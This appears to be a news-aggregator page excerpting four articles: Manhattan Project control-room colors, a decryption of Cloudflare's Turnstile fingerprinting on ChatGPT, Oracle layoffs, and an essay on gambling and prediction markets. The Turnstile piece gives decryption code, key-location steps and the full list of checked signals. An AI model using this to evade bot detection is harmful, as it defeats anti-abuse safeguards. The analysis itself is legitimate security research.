Hello! This is a long, hope­fully fun one! If you’re read­ing this in your email, you may need to click expand” to read all the way to the end of this post. Thank you!

When I lived in Nashville, my girl­friends and I would take our­selves on field trips” across the state. We once went on a tour to spot bald ea­gles in West Tennessee, and upon ar­rival, a woman with fluffy hair in the state park bath­room told us she had seen 113 bald ea­gles the day be­fore. We ended up see­ing (counts on one hand)…2.

In the sum­mer of 2017, we went on an­other field trip to the National Park’s Manhattan Project Site in Oak Ridge, TN. In 1942, Oak Ridge, TN, was cho­sen as the site for a plu­to­nium and ura­nium en­rich­ment plant as part of the Manhattan Project, a top-se­cret WWII ef­fort to de­velop the first atomic bomb. Once a small and rural farm­ing com­mu­nity set­tled in the val­ley of East Tennessee, the swift task to cre­ate a nu­clear bomb grew the se­cret set­tle­ment ti­tled Site X” from 3,000 peo­ple in 1942 to 75,000 by 1945. Alongside the pop­u­la­tion growth, enor­mously com­plex build­ings were built.

A Note: The Manhattan Project cre­ated the nu­clear bomb that caused ex­treme dev­as­ta­tion in Japan and ended the war. There’s a lot of U. S. his­tory that’s aw­ful and in­de­fen­si­ble. Today, though, I’d like to talk about the in­dus­trial de­sign and color the­ory from that era.

Our first stop on the tour was the X-10 Graphite Reactor room and its con­trol panel room. The X-10 Graphite Reactor, a 24-foot-square block of graphite, was the world’s sec­ond full-scale nu­clear re­ac­tor. The plu­to­nium pro­duced from ura­nium there was shipped to Los Alamos, New Mexico, for re­search into the atomic bomb Fat Man.

What caught my eye as a de­signer, as with most in­dus­trial plants and con­trol rooms of that time, be­sides the knobs, levers, and but­tons, was the use of a very spe­cific seafoam green, seen here on the re­ac­tor’s walls and in the con­trol panel room.

Thus be­gan my day-long search, traips­ing through the in­ter­net for his­tor­i­cal in­for­ma­tion about this spe­cific shade of seafoam green.

Thankfully, this path led me to the work of color the­o­rist Faber Birren.

In the fall of 1919, Faber Birren en­tered the Art Institute at the University of Chicago, only to drop out in the spring of 1921 to com­mit him­self to self-ed­u­ca­tion in color, as such a pro­gram did­n’t ex­ist. He spent his days in­ter­view­ing psy­chol­o­gists and physi­cists and con­ducted his own color stud­ies, which were con­sid­ered un­con­ven­tional at the time. He painted his bed­room walls red ver­mil­lion to test if it would make him go mad.

In 1933, he moved to New York City and be­came a self-ap­pointed color con­sul­tant, ap­proach­ing ma­jor cor­po­ra­tions to sell the idea that ap­pro­pri­ate use of color could boost sales. He con­vinced a Chicago whole­sale meat com­pany that the com­pa­ny’s white walls made the meat un­ap­peal­ing. He stud­ied the steaks on var­i­ous col­ored back­grounds and de­ter­mined that a blue/​green back­ground would make the beef ap­pear red­der. Sales went up, and soon a num­ber of in­dus­tries hired Faber to bring color the­ory into their work, in­clud­ing the lead­ing chem­i­cal and wartime con­tract com­pany, as well as the Manhattan Project build­ing de­signer, DuPont.

With the in­crease in wartime pro­duc­tion in the US dur­ing WWII, Birren and DuPont cre­ated a mas­ter color safety code for the in­dus­trial plant in­dus­try, with the aim of re­duc­ing ac­ci­dents and in­creas­ing ef­fi­ciency within plants. These color codes were ap­proved by the National Safety Council in 1944 and are now in­ter­na­tion­ally rec­og­nized, hav­ing been manda­tory prac­tice since 1948. The color cod­ing went as such:

* Fire Red: All fire pro­tec­tion, emer­gency stop but­tons, and flam­ma­ble liq­uids should be red

* Solar Yellow: Signifies cau­tion and phys­i­cal haz­ards such as falling

* Safety Green: Indicates safety fea­tures such as first-aid equip­ment, emer­gency ex­its, and eye­wash sta­tions.

* Light Green: Used on walls to re­duce vi­sual fa­tigue

My in­dus­trial seafoam” light green mys­tery has fi­nally been solved thanks to this ar­ti­cle from UChicago Magazine.

Keeping in theme with control rooms”, I re­searched the sec­ond Manhattan Project plant, the Hanford Site, home to the B Reactor, the first full-scale plu­to­nium pro­duc­tion re­ac­tor in the world. To my sur­prise, this site looked like an ode to Birren’s light green and color codes, which makes sense, since his client, DuPont, was also re­spon­si­ble for the de­sign and con­struc­tion of Hanford.

In Birren’s 1963 book Color for Interiors: Historical and Modern, he writes about re­search un­der­taken to mea­sure eye fa­tigue in the in­dus­trial work­place and the ef­fects of in­te­rior color on hu­man ef­fi­ciency and well-be­ing. Using the color chart above, he states that the proper use of color hues can re­duce ac­ci­dents, raise stan­dards of ma­chine main­te­nance, and im­prove la­bor morale.

The im­por­tance of color in fac­to­ries is first to con­trol bright­ness in the gen­eral field of view for an ef­fi­cient see­ing con­di­tion. Interiors can then be con­di­tioned for emo­tional plea­sure and in­ter­est, us­ing warm, cool, or lu­mi­nois hues as work­ing con­di­tions sug­gest. Color should be func­tional and not merely dec­o­ra­tive.” - Faber Birren

Now, look­ing at the in­te­ri­ors of the Manhattan Project con­trol rooms and plants, the broad use of Light and Medium Green makes sense. One mis­take and mass dev­as­ta­tion could have oc­curred within these towns. Birren writes, Note that most of the stan­dards are soft in tone. This is de­lib­er­ate and in­tended to es­tab­lish a non-dis­tract­ing en­vi­ron­ment. Green is a rest­ful and nat­ural-look­ing color for av­er­age fac­tory in­te­ri­ors. Light Green with Medium Green is sug­gested.”

Let’s put these the­o­ries to work with this photo of the B-Reactor room found at the Hanford Site of the Manhattan Project. In Birren’s book, he di­rected the fol­low­ing color ap­pli­ca­tions for small in­dus­trial ar­eas:

* ✔️ Medium Gray is pro­posed for ma­chin­ery, equip­ment, and racks

* ✔️ Beige walls may be ap­plied to in­te­ri­ors de­prived of nat­ural light

As we can see, his color the­ory was fol­lowed to a T.

Other US Industrial Plants that Used these Color Methods

This color the­ory re­search just opened a whole can of de­sign worms for me, and I’m ex­cited to dive into them more. For ex­am­ple, Germany de­vel­oped its own seafoam green, specif­i­cally de­signed for bridges, called Cologne Bridge Green. That’s a post for an­other day.

And fi­nally, if you en­joy this sort of de­sign, I de­signed a font called Parts List” that is meant to evoke the feel­ing of sit­ting in an oil change wait­ing room, with the smell of burnt cof­fee. I cre­ated this font out of old auto parts lists, and it’s a per­fectly wob­bly type­face that will give you that Is it a type­writer or hand­writ­ing?’ feel­ing. It’s now avail­able on my web­site.

PS: I have an old friend whose dad still works at the Uranium plant in Oak Ridge. I told him that I was sur­prised that al­most all of the fa­cil­i­ties had been torn down, and he just looked at me straight in the face and said, Who said it’s ac­tu­ally gone?” Noted. ✌️

Thanks for be­ing here!

...

Read the original on bethmathews.substack.com »

7 927 shares, 37 trendiness

ChatGPT Won't Let You Type Until Cloudflare Reads Your React State. I Decrypted the Program That Does It.

Every ChatGPT mes­sage trig­gers a Cloudflare Turnstile pro­gram that runs silently in your browser. I de­crypted 377 of these pro­grams from net­work traf­fic and found some­thing that goes be­yond stan­dard browser fin­ger­print­ing.

The pro­gram checks 55 prop­er­ties span­ning three lay­ers: your browser (GPU, screen, fonts), the Cloudflare net­work (your city, your IP, your re­gion from edge head­ers), and the ChatGPT React ap­pli­ca­tion it­self (__reactRouterContext, load­er­Data, client­Boot­strap). Turnstile does­n’t just ver­ify that you’re run­ning a real browser. It ver­i­fies that you’re run­ning a real browser that has fully booted a spe­cific React ap­pli­ca­tion.

A bot that spoofs browser fin­ger­prints but does­n’t ren­der the ac­tual ChatGPT SPA will fail.

The Turnstile byte­code ar­rives en­crypted. The server sends a field called turn­stile.dx in the pre­pare re­sponse: 28,000 char­ac­ters of base64 that change on every re­quest.

The outer layer is XOR’d with the p to­ken from the pre­pare re­quest. Both travel in the same HTTP ex­change, so de­crypt­ing it is straight­for­ward:

outer = json.loads(bytes(

base64de­code(dx)[i] ^ p_­to­ken[i % len(p_­to­ken)]

for i in range(len(base64de­code(dx)))

# → 89 VM in­struc­tions

Inside those 89 in­struc­tions, there is a 19KB en­crypted blob con­tain­ing the ac­tual fin­ger­print­ing pro­gram. This in­ner blob uses a dif­fer­ent XOR key that is not the p to­ken.

Initially I as­sumed this key was de­rived from per­for­mance.now() and was truly ephemeral. Then I looked at the byte­code more care­fully and found the key sit­ting in the in­struc­tions:

[41.02, 0.3, 22.58, 12.96, 97.35]

The last ar­gu­ment, 97.35, is the XOR key. A float lit­eral, gen­er­ated by the server, em­bed­ded in the byte­code it sent to the browser. I ver­i­fied this across 50 re­quests. Every time, the float from the in­struc­tion de­crypts the in­ner blob to valid JSON. 50 out of 50.

The full de­cryp­tion chain re­quires noth­ing be­yond the HTTP re­quest and re­sponse:

1. Read p from pre­pare re­quest

2. Read turn­stile.dx from pre­pare re­sponse

3. XOR(base64decode(dx), p) → outer byte­code

4. Find the 5-arg in­struc­tion af­ter the 19KB blob → last arg is the key

5. XOR(base64decode(blob), str(key)) → in­ner pro­gram (417-580 VM in­struc­tions)

The key is in the pay­load.

Each in­ner pro­gram uses a cus­tom VM with 28 op­codes (ADD, XOR, CALL, BTOA, RESOLVE, BIND_METHOD, JSON_STRINGIFY, etc.) and ran­dom­ized float reg­is­ter ad­dresses that change per re­quest. I mapped the op­codes from the SDK source (sdk.js, 1,411 lines, de­ob­fus­cated).

The pro­gram col­lects 55 prop­er­ties. No vari­a­tion across 377 sam­ples. All 55, every time, or­ga­nized into three lay­ers:

Storage (5): stor­age, quota, es­ti­mate, setItem, us­age. Also writes the fin­ger­print to lo­cal­Stor­age un­der key 6f376b6560133c2c for per­sis­tence across page loads.

These are in­jected server-side by Cloudflare’s edge. They ex­ist only if the re­quest passed through Cloudflare’s net­work. A bot mak­ing di­rect re­quests to the ori­gin server or run­ning be­hind a non-Cloud­flare proxy will pro­duce miss­ing or in­con­sis­tent val­ues.

This is the part that mat­ters. __reactRouterContext is an in­ter­nal data struc­ture that React Router v6+ at­taches to the DOM. load­er­Data con­tains the route loader re­sults. client­Boot­strap is spe­cific to ChatGPT’s SSR hy­dra­tion.

These prop­er­ties only ex­ist if the ChatGPT React ap­pli­ca­tion has fully ren­dered and hy­drated. A head­less browser that loads the HTML but does­n’t ex­e­cute the JavaScript bun­dle won’t have them. A bot frame­work that stubs out browser APIs but does­n’t ac­tu­ally run React won’t have them.

This is bot de­tec­tion at the ap­pli­ca­tion layer, not the browser layer.

After col­lect­ing all 55 prop­er­ties, the pro­gram hits a 116-byte en­crypted blob that de­crypts to 4 fi­nal in­struc­tions:

[96.05, 3.99, 3.99], // JSON.stringify(fingerprint)

[22.58, 46.15, 57.34], // store

[33.34, 3.99, 74.43], // XOR(json, key)

[1.51, 56.88, 3.99] // RESOLVE → be­comes the to­ken

The fin­ger­print is JSON.stringify’d, XOR’d, and re­solved back to the par­ent. The re­sult is the OpenAI-Sentinel-Turnstile-Token header sent with every con­ver­sa­tion re­quest.

Turnstile is one of three chal­lenges. The other two:

Signal Orchestrator (271 in­struc­tions): Installs event lis­ten­ers for key­down, point­er­move, click, scroll, paste, and wheel. Monitors 36 win­dow.__oai_­so_* prop­er­ties track­ing key­stroke tim­ing, mouse ve­loc­ity, scroll pat­terns, idle time, and paste events. A be­hav­ioral bio­met­ric layer run­ning un­der­neath the fin­ger­print.

Proof of Work (25-field fin­ger­print + SHA-256 hash­cash): Difficulty is uni­form ran­dom (400K-500K), 72% solve un­der 5ms. Includes 7 bi­nary de­tec­tion flags (ai, cre­atePRNG, cache, solana, dump, InstallTrigger, data), all zero across 100% of 100 sam­ples. The PoW adds com­pute cost but is not the real de­fense.

The XOR key for the in­ner pro­gram is a server-gen­er­ated float em­bed­ded in the byte­code. Whoever gen­er­ated the turn­stile.dx knows the key. The pri­vacy bound­ary be­tween the user and the sys­tem op­er­a­tor is a pol­icy de­ci­sion, not a cryp­to­graphic one.

The ob­fus­ca­tion serves real op­er­a­tional pur­poses: it hides the fin­ger­print check­list from sta­tic analy­sis, pre­vents the web­site op­er­a­tor (OpenAI) from read­ing raw fin­ger­print val­ues with­out re­verse-en­gi­neer­ing the byte­code, makes each to­ken unique to pre­vent re­play, and al­lows Cloudflare to change what the pro­gram checks with­out any­one notic­ing.

But the encryption” is XOR with a key that’s in the same data stream. It pre­vents ca­sual in­spec­tion. It does not pre­vent analy­sis.

No sys­tems were ac­cessed with­out au­tho­riza­tion. No in­di­vid­ual user data is dis­closed. All traf­fic was ob­served from con­sented par­tic­i­pants. The Sentinel SDK was beau­ti­fied and man­u­ally de­ob­fus­cated. All de­cryp­tion was per­formed of­fline us­ing Python.

...

Read the original on www.buchodi.com »

8 899 shares, 2 trendiness

Oracle slashes 30,000 jobs with a cold 6 a.m. email

It was not a phone call. It was not a meet­ing. For thou­sands of Oracle em­ploy­ees across the globe, Tuesday morn­ing be­gan with a sin­gle email land­ing in their in­boxes just af­ter 6 a.m. EST — and by the time they fin­ished read­ing it, their ca­reers at one of the world’s largest tech­nol­ogy com­pa­nies were over.

Oracle has launched what an­a­lysts be­lieve could be the most ex­ten­sive lay­off in the com­pa­ny’s his­tory, with es­ti­mates sug­gest­ing the cuts will af­fect be­tween 20,000 and 30,000 em­ploy­ees — roughly 18% of its global work­force of ap­prox­i­mately 162,000 peo­ple. Workers in the United States, India, and other re­gions all re­ported re­ceiv­ing the same ter­mi­na­tion no­tice at nearly the same hour, sent un­der the name Oracle Leadership.”

There was no heads-up from hu­man re­sources, no con­ver­sa­tion with a di­rect man­ager, and no ad­vance no­tice of any kind. Just an email.

The email that cir­cu­lated widely af­ter screen­shots were posted by af­fected work­ers on Reddit’s r/​em­ploy­eesO­fOr­a­cle com­mu­nity and the pro­fes­sional fo­rum Blind was brief and for­mu­laic. It told em­ploy­ees that fol­low­ing a re­view of the com­pa­ny’s cur­rent busi­ness needs, a de­ci­sion had been made to elim­i­nate their roles as part of a broader or­ga­ni­za­tional change, that the day of the email was their fi­nal work­ing day, and that a sev­er­ance pack­age would be made avail­able af­ter sign­ing ter­mi­na­tion pa­per­work through DocuSign.

Employees were also in­structed to up­date their per­sonal email ad­dresses to re­ceive sub­se­quent com­mu­ni­ca­tions, in­clud­ing sep­a­ra­tion de­tails and an­swers to fre­quently asked ques­tions. For many, ac­cess to in­ter­nal pro­duc­tion sys­tems was re­voked al­most im­me­di­ately af­ter the mes­sage ar­rived.

Based on ac­counts shared across both Reddit and Blind, the cuts were wide­spread and, in some units, se­vere. Among the teams re­ported to be most af­fected:

RHS (Revenue and Health Sciences) — em­ploy­ees de­scribed a re­duc­tion in force of at least 30%, with 16 or more en­gi­neers from in­di­vid­ual busi­ness units cut in a sin­gle ac­tion.

SVOS (SaaS and Virtual Operations Services) — sim­i­larly re­ported a 30% or greater re­duc­tion, with man­ager-level roles in­cluded in the sweep.

At least one man­ager was con­firmed among those let go, and af­fected em­ploy­ees in India said the sev­er­ance struc­ture is ex­pected to fol­low a stan­dard for­mula based on years of ser­vice, paid out in months. Any un­vested re­stricted stock units, how­ever, were for­feited im­me­di­ately.

Workers who had vested stock were told they would re­tain ac­cess to those shares through Fidelity. Some em­ploy­ees noted April 3 as their for­mal last work­ing day, with a one-month gar­den leave pe­riod to fol­low. Separately, posts on Blind al­leged that Oracle had re­cently in­stalled mon­i­tor­ing soft­ware on com­pany-is­sued Mac lap­tops ca­pa­ble of log­ging all de­vice ac­tiv­ity, with warn­ings cir­cu­lat­ing among af­fected em­ploy­ees not to copy any files or code be­fore re­turn­ing their ma­chines.

The lay­offs are di­rectly tied to Oracle’s ag­gres­sive and debt-heavy ex­pan­sion into ar­ti­fi­cial in­tel­li­gence in­fra­struc­ture. According to analy­sis from TD Cowen, the job cuts are ex­pected to free up be­tween $8 bil­lion and $10 bil­lion in cash flow — money the com­pany ur­gently needs to fund a mas­sive build­out of AI data cen­ters.

The fi­nan­cial pic­ture sur­round­ing that ex­pan­sion is strik­ing. Oracle has taken on $58 bil­lion in new debt within just two months. Its stock has lost more than half its value since reach­ing a peak in September 2025. Multiple U. S. banks have re­port­edly stepped back from fi­nanc­ing some of its data cen­ter pro­jects. All of this is hap­pen­ing even as the com­pany posted a 95% jump in net in­come — reach­ing $6.13 bil­lion — last quar­ter.

The con­trast un­der­scores the scale of the bet Oracle is mak­ing: record prof­its on one side, a mount­ing debt load and tens of thou­sands of elim­i­nated jobs on the other. For the work­ers who woke up Tuesday morn­ing to that 6 a.m. email, the com­pa­ny’s am­bi­tions of­fered lit­tle com­fort.

...

Read the original on rollingout.com »

9 859 shares, 27 trendiness

We Haven’t Seen the Worst of What Gambling and Prediction Markets Will Do to America

Here are three sto­ries about the state of gam­bling in America.

In November 2025, two pitch­ers for the Cleveland Guardians, Emmanuel Clase and Luis Ortiz, were charged in a con­spir­acy for rigging pitches.” Frankly, I had never heard of rigged pitches be­fore, but the fed­eral in­dict­ment de­scribes a scheme so sim­ple that it’s a mir­a­cle that this sort of thing does­n’t hap­pen all the time. Three years ago, a few cor­rupt bet­tors ap­proached the pitch­ers with a tan­ta­liz­ing deal: (1) We’ll bet that cer­tain pitches will be balls; (2) you throw those pitches into the dirt; (3) we’ll win the bets and give you some money.

The plan worked. Why would­n’t it? There are hun­dreds of pitches thrown in a base­ball game, and no­body cares about one bad pitch. The bets were so de­vi­ously clever be­cause they of­fered enor­mous re­wards for bet­tors and only in­ci­den­tal in­con­ve­nience for play­ers and view­ers. Before their plan was snuffed out, the fraud­sters won $450,000 from pitches that not even the most ar­dent Cleveland base­ball fan would ever re­mem­ber the next day. Nobody watch­ing America’s pas­time could have guessed that they were wit­ness­ing a six-fig­ure fraud.

On the morn­ing of February 28th, some­one logged onto the pre­dic­tion mar­ket web­site Polymarket and made an un­usu­ally large bet. This bet was­n’t placed on a base­ball game. It was­n’t placed on any sport. This was a bet that the United States would bomb Iran on a spe­cific day, de­spite ex­tremely low odds of such a thing hap­pen­ing.

A few hours later, bombs landed in Iran. This one bet was part of a $553,000 pay­day for a user named Magamyman.” And it was just one of dozens of sus­pi­cious, per­fectly-timed wa­gers, to­tal­ing mil­lions of dol­lars, placed in the hours be­fore a war be­gan.

It is al­most im­pos­si­ble to be­lieve that, who­ever Magamyman is, he did­n’t have in­side in­for­ma­tion from mem­bers of the ad­min­is­tra­tion. The term war prof­i­teer­ing typ­i­cally refers to arms deal­ers who get rich from war. But we now live in a world not only where on­line bet­tors stand to profit from war, but also where key de­ci­sion mak­ers in gov­ern­ment have the tan­ta­liz­ing op­tions to make hun­dreds of thou­sands of dol­lars by syn­chro­niz­ing mil­i­tary en­gage­ments with their gam­bling po­si­tion.

On March 10, sev­eral days into the Iran War, the jour­nal­ist Emanuel Fabian re­ported that a war­head launched from Iran struck a site out­side Jerusalem.

Meanwhile on Polymarket, users had placed bets on the pre­cise lo­ca­tion of mis­sile strikes on March 10. Fabian’s ar­ti­cle was there­fore poised to de­ter­mine pay­outs of $14 mil­lion in bet­ting. As The Atlantic’s Charlie Warzel re­ported, bet­tors en­cour­aged him to rewrite his story to pro­duce the out­come that they’d bet on. Others threat­ened to make his life miserable.”

A clever dystopian nov­el­ist might con­ceive of a fu­ture where poorly paid jour­nal­ists for news wires are of­fered six-fig­ure deals to re­port fic­tions that cash out bets from on­line pre­dic­tion mar­kets. But just how fan­ci­ful is that sce­nario when we have good rea­son to be­lieve that jour­nal­ists are al­ready be­ing pres­sured, bul­lied, and threat­ened to pub­lish spe­cific sto­ries that align with multi-thou­sand dol­lar bets about the fu­ture?

Put it all to­gether: rigged pitches, rigged war bets, and at­tempts to rig wartime jour­nal­ism. Without con­text, each story would sound like a wacky con­spir­acy the­ory. But these are not con­spir­acy the­o­ries. These are things that have hap­pened. These are con­spir­a­cies—full stop.

If you’re not para­noid, you’re not pay­ing at­ten­tion” has his­tor­i­cally been one of those bumper­stick­ers you find on the back of a car with so many other bumper­stick­ers that you worry for the san­ity of its oc­cu­pants. But in this weird new re­al­ity where every event on the planet has a price, and be­hind every price is a shad­owy coun­ter­party, the jit­tery gam­bler’s para­noia—is what I’m watch­ing hap­pen­ing be­cause some­body more pow­er­ful than me bet on it?—is start­ing to seem, eerily, like a kind of per­verse com­mon sense.

What’s re­mark­able is not just the fact that on­line sports books have taken over sports, or that bet­ting mar­kets have metas­ta­sized in pol­i­tics and cul­ture, but the speed with which both have taken place.

For most of the last cen­tury, the ma­jor sports leagues were ve­he­mently against gam­bling, as the Atlantic staff writer McKay Coppins ex­plained in his re­cent fea­ture. In 1992, NFL com­mis­sioner Paul Tagliabue told Congress that nothing has done more to de­spoil the games Americans play and watch than wide­spread gam­bling on them.” In 2012, NBA com­mis­sioner David Stern loudly threat­ened New Jersey Gov. Chris Christie for sign­ing a bill to le­gal­ize sports bet­ting in the Garden State, re­port­edly scream­ing, we’re go­ing to come af­ter you with every­thing we’ve got.”

So much for that. Following the 2018 Supreme Court de­ci­sion Murphy vs. NCAA, sports gam­bling was un­leashed into the world, and the leagues haven’t looked back. Last year, the NFL saw $30 bil­lion gam­bled on foot­ball games, and the league it­self made half a bil­lion dol­lars in ad­ver­tis­ing, li­cens­ing, and data deals.

Nine years ago, Americans bet less than $5 bil­lion on sports. Last year, that num­ber rose to at least $160 bil­lion. Big num­bers mean noth­ing to me, so let me put that sta­tis­tic an­other way: $5 bil­lion is roughly the amount Americans spend an­nu­ally at coin-op­er­ated laun­dro­mats and $160 bil­lion is nearly what Americans spent last year on do­mes­tic air­line tick­ets. So, in a decade, the on­line sports gam­bling in­dus­try will have risen from the level of coin laun­dro­mats to ri­val the en­tire air­line in­dus­try.

And now here come the pre­dic­tion mar­kets, such as Polymarket and Kalshi, whose com­bined 2025 rev­enue came in around $50 bil­lion. These pre­dic­tive mar­kets are the log­i­cal end­point of the on­line gam­bling boom,” Coppins told me on my pod­cast Plain English. We have taught the en­tire American pop­u­la­tion how to gam­ble with sports. We’ve made it fric­tion­less and easy and put it on every­body’s phone. Why not ex­tend the logic and cul­ture of gam­bling to other seg­ments of American life?” He con­tin­ued:

Why not let peo­ple gam­ble on who’s go­ing to win the Oscar, when Taylor Swift’s wed­ding will be, how many peo­ple will be de­ported from the United States next year, when the Iranian regime will fall, whether a nu­clear weapon will be det­o­nated in the year 2026, or whether there will be a famine in Gaza? These are not things that I’m mak­ing up. These are all bets that you can make on these pre­dic­tive mar­kets.

Indeed, why not let peo­ple gam­ble on whether there will be a famine in Gaza? The mar­ket logic is cold and sim­ple: More bets means more in­for­ma­tion, and more in­for­ma­tional vol­ume is more ef­fi­ciency in the mar­ket­place of all fu­ture hap­pen­ings. But from an­other per­spec­tive—let’s call it, base­line moral­ity?—the trans­for­ma­tion of a famine into a wind­fall event for pre­scient bet­tors seems so grotesque as to re­quire no elab­o­ra­tion. One imag­ines a young man send­ing his 1099 doc­u­ments to a tax ac­coun­tant the fol­low­ing spring: right, so here are my div­i­dends, these are the cap gains, and, oh yeah, here’s my $9,000 pay­out for to­tally nail­ing when all those kids would die.”

It is a com­fort­ing myth that dystopias hap­pen when ob­vi­ously bad ideas go too far. Comforting, be­cause it plays to our naive hope that the world can be di­vided into sta­tic cat­e­gories of good ver­sus evil and that once we stig­ma­tize all the bad peo­ple and ghet­toize all the bad ideas, some utopia will spring into view. But I think dystopias more likely hap­pen be­cause seem­ingly good ideas go too far. Pleasure is bet­ter than pain” is a sen­si­ble no­tion, and a so­ci­ety de­voted to its im­pli­ca­tions cre­ated Brave New World. Order is bet­ter than dis­or­der” sounds al­right to me, but a so­ci­ety de­voted to the most grotesque vi­sion of that prin­ci­ple takes us to 1984. Sports gam­bling is fun, and pre­dic­tion mar­kets can fore­cast fu­ture events. But ex­tended with­out guardrails or lim­i­ta­tions, those prin­ci­ples lead to a world where ubiq­ui­tous gam­bling leads to cheat­ing, cheat­ing leads to dis­trust, and dis­trust leads ul­ti­mately to cyn­i­cism or out­right dis­en­gage­ment.

The cri­sis of au­thor­ity that has kind of al­ready vis­ited every other American in­sti­tu­tion in the last cou­ple of decades has ar­rived at pro­fes­sional sports,” Coppins said. Two-thirds of Americans now be­lieve that pro­fes­sional ath­letes some­times change their per­for­mance to in­flu­ence gam­bling out­comes. Not to over­state it, but that’s a dis­as­ter,” he said. And not just for sports.

There are four rea­sons to worry about the ef­fect of gam­bling in sports and cul­ture.

The first is the risk to in­di­vid­ual bet­tors. Every time we cre­ate 1,000 new gam­blers, we cre­ate dozens of new ad­dicts and a hand­ful of new bank­rupt­cies. As I’ve re­ported, there is ev­i­dence that about one in five men un­der 25 is on the spec­trum of hav­ing a gam­bling prob­lem, and calls to the National Problem Gambling Helpline have roughly tripled since sports gam­bling was broadly le­gal­ized in 2018. Research from UCLA and USC found that bank­rupt­cies in­creased by 10 per­cent in states that le­gal­ized on­line sports bet­ting be­tween 2018 and 2023. People will some­times ask me what busi­ness I have wor­ry­ing about on­line gam­bling when peo­ple should be free to spend their money how­ever they like. My re­sponse is that wise rules place guardrails around eco­nomic ac­tiv­ity with a cer­tain rate of per­sonal harm. For al­co­hol, we have li­cens­ing re­quire­ments, min­i­mum drink­ing ages, bound­aries around hours of sale, and rules about pub­lic con­sump­tion. As al­co­hol con­sump­tion is de­clin­ing among young peo­ple, gam­bling is surg­ing; Gen Z has re­placed one (often fun) vice with a mean­ing­ful chance of ad­dic­tion with an­other (often fun) vice with a mean­ing­ful chance of ad­dic­tion. But whereas we have cen­turies of ex­pe­ri­ence cur­tail­ing ex­ces­sive drink­ing with rules and cus­toms, we are cur­rently in a free-for-all era of gam­bling.

The sec­ond risk is to in­di­vid­ual play­ers and prac­ti­tion­ers. One rea­son why sports com­mis­sion­ers might have wanted to keep gam­bling out of their busi­ness is that gam­blers turns some peo­ple into com­plete psy­chopaths, and that’s not a very nice ex­pe­ri­ence for folks on the re­ceiv­ing end of gam­bling-af­flicted psy­chopaths. In his fea­ture, McKay Coppins re­ports on the ex­pe­ri­ence of Caroline Garcia, a top-ranked ten­nis player, who said she re­ceived tor­rents of abu­sive mes­sages from gam­blers both for los­ing games and for win­ning games. This has be­come a very com­mon ex­pe­ri­ence for ath­letes at the pro­fes­sional level, even at the col­lege level too,” Coppins said. As the ex­pe­ri­ence of jour­nal­ist Emanuel Fabian shows, gam­bling can turn or­di­nary peo­ple into mini mob bosses, who go around threat­en­ing play­ers and prac­ti­tion­ers who they be­lieve are cost­ing them thou­sands of dol­lars.

The third risk is to the in­tegrity of sports—or any other in­sti­tu­tion. At the end of 2025, in ad­di­tion to its in­dict­ment of the Cleveland Guardians pitch­ers, the FBI an­nounced 30 ar­rests in­volv­ing gam­bling schemes in the NBA. This cav­al­cade of ar­rests has dra­mat­i­cally re­duced trust in sports. Two-thirds of Americans now be­lieve that pro­fes­sional ath­letes change their per­for­mance to in­flu­ence gam­bling out­comes. It does not re­quire ex­tra­or­di­nary cre­ativ­ity to imag­ine how this prin­ci­ple could ex­tend to other do­mains and in­sti­tu­tions. If more peo­ple start to be­lieve that things only hap­pen in the world as a di­rect re­sult of shad­owy in­ter­ests in vast bet­ting mar­kets, it’s go­ing to be a per­ma­nent open sea­son for con­spir­acy the­o­ries.

The ul­ti­mate risk is al­most too dark to con­tem­plate in much de­tail. As the logic and cul­ture of casi­nos moves from sports to pol­i­tics, the scan­dals that have vis­ited base­ball and bas­ket­ball might soon ar­rive in pol­i­tics. Is it re­ally so un­be­liev­able that a politi­cian might tip off a friend, or as­suage an en­emy, by giv­ing them in­side in­for­ma­tion that would al­low them to profit on bet­ting mar­kets? Is it re­ally so in­cred­i­ble to be­lieve that a gov­ern­ment of­fi­cial would try to align pol­icy with a bet­ting po­si­tion that stood to earn them, or an al­lied group, hun­dreds of thou­sands of dol­lars? That is what a rigged pitch” in pol­i­tics would look like. It’s not just wa­ger­ing on a pol­icy out­come that you sus­pect will hap­pen. It’s chang­ing pol­icy out­comes based on what can be wa­gered.

Gambling is flour­ish­ing be­cause it meets the needs of our mo­ment: a low-trust world, where lonely young peo­ple are seek­ing high-risk op­por­tu­ni­ties to launch them into wealth and com­fort. In such an en­vi­ron­ment, fi­nan­cial­iza­tion might seem to be the last form of civic par­tic­i­pa­tion that feels hon­est to a large por­tion of the coun­try. Voting is com­pro­mised, and polling is ma­nip­u­lated, and news is al­go­rith­mi­cally cu­rated. But a bet set­tles. A game ends. There is com­fort in that. In an un­cer­tain and il­leg­i­ble world, it does­n’t get much more cer­tain and leg­i­ble than this: You won, or you lost.

A 2023 Wall Street Journal poll found that Americans are pulling away from prac­ti­cally every value that once de­fined na­tional life—pa­tri­o­tism, re­li­gion, com­mu­nity, fam­ily. Young peo­ple care less than their par­ents about mar­riage, chil­dren, or faith. But na­ture, ab­hor­ring a vac­uum, is fill­ing the moral void left by re­treat­ing in­sti­tu­tions with the mar­ket. Money has be­come our fi­nal virtue.

I of­ten find my­self think­ing about the philoso­pher Alasdair MacIntyre, who ar­gued in the in­tro­duc­tion of After Virtue that moder­nity had de­stroyed the shared moral lan­guage once sup­plied by tra­di­tions and re­li­gion, leav­ing us with only the lan­guage of in­di­vid­ual pref­er­ence. Virtue did not dis­ap­pear, I think, so much as it died and was rein­car­nated as the mar­ket. It is now the mar­ket that tells us what things are worth, what events mat­ter, whose pre­dic­tions are cor­rect, who is win­ning, who counts. Money has, in a strange way, be­come the last moral ar­biter stand­ing—the fi­nal uni­ver­sal lan­guage that a plu­ral­is­tic, dis­trust­ful, post-in­sti­tu­tional so­ci­ety can use to com­mu­ni­cate with it­self.

As this moral vo­cab­u­lary scales across cul­ture, it also cor­rodes cul­ture. In sports, when you have money on a game, you’re not root­ing for a team. You’re root­ing for a propo­si­tion. The so­cial func­tion of fan­dom—shared iden­tity, in­her­ited loy­alty, some­thing larger than your­self—dis­solves into in­di­vid­ual risk. In pol­i­tics, I fear the con­se­quences will be worse. Prediction mar­kets can be use­ful for those who want to know the fu­ture, but their util­ity re­cruits par­tic­i­pants into a re­la­tion­ship with the news cy­cle that is ad­ver­sar­ial, and even mis­an­thropic. A young man bet­ting on a ter­ror­ist at­tack or a famine is not act­ing as a mere con­cerned cit­i­zen whose par­tic­i­pa­tion im­proves the ef­fi­ciency of global pre­dic­tion mar­kets. He’s just a dude, on his phone, alone in a room, choos­ing to root for death.

